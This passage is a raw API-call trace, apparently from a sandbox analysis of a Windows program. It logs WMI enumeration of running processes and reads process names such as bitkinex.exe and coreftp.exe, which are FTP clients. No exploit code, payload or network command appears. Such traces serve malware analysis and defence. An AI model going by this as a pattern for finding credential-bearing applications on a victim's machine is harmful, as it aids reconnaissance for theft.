[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514ce8) returned 0x0 [0265.068] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514ce8) returned 0x0 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.068] WbemDefPath:IUnknown:AddRef (This=0x5514ce8) returned 0x3 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523980) returned 0x0 [0265.068] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523980, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.068] WbemDefPath:IUnknown:Release (This=0x5523980) returned 0x3 [0265.069] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.069] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.069] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.108] WbemDefPath:IUnknown:Release (This=0x5514ce8) returned 0x2 [0265.108] WbemDefPath:IUnknown:Release (This=0x5514ce8) returned 0x1 [0265.108] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.108] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514ce8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514ce8) returned 0x0 [0265.109] WbemDefPath:IUnknown:AddRef (This=0x5514ce8) returned 0x3 [0265.109] WbemDefPath:IUnknown:Release (This=0x5514ce8) returned 0x2 [0265.109] WbemDefPath:IWbemPath:SetText (This=0x5514ce8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3772\"") returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.110] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.110] IWbemClassObject:Get (in: This=0x551fd98, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d5f60*=0, plFlavor=0x23d5f64*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x23d5f60*=8, plFlavor=0x23d5f64*=0) returned 0x0 [0265.111] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0265.111] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0265.111] IWbemClassObject:Get (in: This=0x551fd98, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d5f60*=8, plFlavor=0x23d5f64*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x23d5f60*=8, plFlavor=0x23d5f64*=0) returned 0x0 [0265.111] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0265.111] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0265.111] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.111] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551f738, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.112] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f738) returned 0x0 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.113] IUnknown:AddRef (This=0x551f738) returned 0x3 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.113] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f73c) returned 0x0 [0265.113] IMarshal:GetUnmarshalClass (in: This=0x551f73c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.113] IUnknown:Release (This=0x551f73c) returned 0x3 [0265.113] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.114] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.114] IUnknown:QueryInterface (in: This=0x551f738, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.114] IUnknown:Release (This=0x551f738) returned 0x2 [0265.114] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.114] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.114] IUnknown:QueryInterface (in: This=0x551f738, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f738) returned 0x0 [0265.114] IUnknown:AddRef (This=0x551f738) returned 0x4 [0265.114] IUnknown:Release (This=0x551f738) returned 0x3 [0265.114] IUnknown:Release (This=0x551f738) returned 0x2 [0265.114] CoTaskMemFree (pv=0x54ba2c8) [0265.114] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.114] IUnknown:AddRef (This=0x551f738) returned 0x3 [0265.114] IWbemClassObject:Get (in: This=0x551f738, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.114] IWbemClassObject:Get (in: This=0x551f738, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3364\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.115] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3364\"") returned 0x5e [0265.115] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3364\"") returned 0x5e [0265.115] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.115] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.115] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.115] IUnknown:Release (This=0x601a94) returned 0x1 [0265.116] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.118] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.118] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55150d8) returned 0x0 [0265.118] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.118] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55150d8) returned 0x0 [0265.118] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.118] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.118] WbemDefPath:IUnknown:AddRef (This=0x55150d8) returned 0x3 [0265.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55229f0) returned 0x0 [0265.119] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55229f0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.119] WbemDefPath:IUnknown:Release (This=0x55229f0) returned 0x3 [0265.119] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.119] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.119] WbemDefPath:IUnknown:Release (This=0x55150d8) returned 0x2 [0265.119] WbemDefPath:IUnknown:Release (This=0x55150d8) returned 0x1 [0265.119] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.119] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x55150d8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55150d8) returned 0x0 [0265.119] WbemDefPath:IUnknown:AddRef (This=0x55150d8) returned 0x3 [0265.119] WbemDefPath:IUnknown:Release (This=0x55150d8) returned 0x2 [0265.120] WbemDefPath:IWbemPath:SetText (This=0x55150d8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3364\"") returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.120] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.120] IWbemClassObject:Get (in: This=0x551f738, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d67f4*=0, plFlavor=0x23d67f8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x23d67f4*=8, plFlavor=0x23d67f8*=0) returned 0x0 [0265.120] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0265.120] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0265.121] IWbemClassObject:Get (in: This=0x551f738, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d67f4*=8, plFlavor=0x23d67f8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x23d67f4*=8, plFlavor=0x23d67f8*=0) returned 0x0 [0265.121] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0265.121] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0265.121] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.121] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x551ef40, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.122] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551ef40) returned 0x0 [0265.122] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.122] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.122] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.123] IUnknown:AddRef (This=0x551ef40) returned 0x3 [0265.123] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.123] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.123] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551ef44) returned 0x0 [0265.123] IMarshal:GetUnmarshalClass (in: This=0x551ef44, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.123] IUnknown:Release (This=0x551ef44) returned 0x3 [0265.123] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.123] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.123] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.123] IUnknown:Release (This=0x551ef40) returned 0x2 [0265.123] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.123] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.123] IUnknown:QueryInterface (in: This=0x551ef40, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551ef40) returned 0x0 [0265.123] IUnknown:AddRef (This=0x551ef40) returned 0x4 [0265.123] IUnknown:Release (This=0x551ef40) returned 0x3 [0265.124] IUnknown:Release (This=0x551ef40) returned 0x2 [0265.124] CoTaskMemFree (pv=0x54ba398) [0265.124] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.124] IUnknown:AddRef (This=0x551ef40) returned 0x3 [0265.124] IWbemClassObject:Get (in: This=0x551ef40, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.124] IWbemClassObject:Get (in: This=0x551ef40, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, 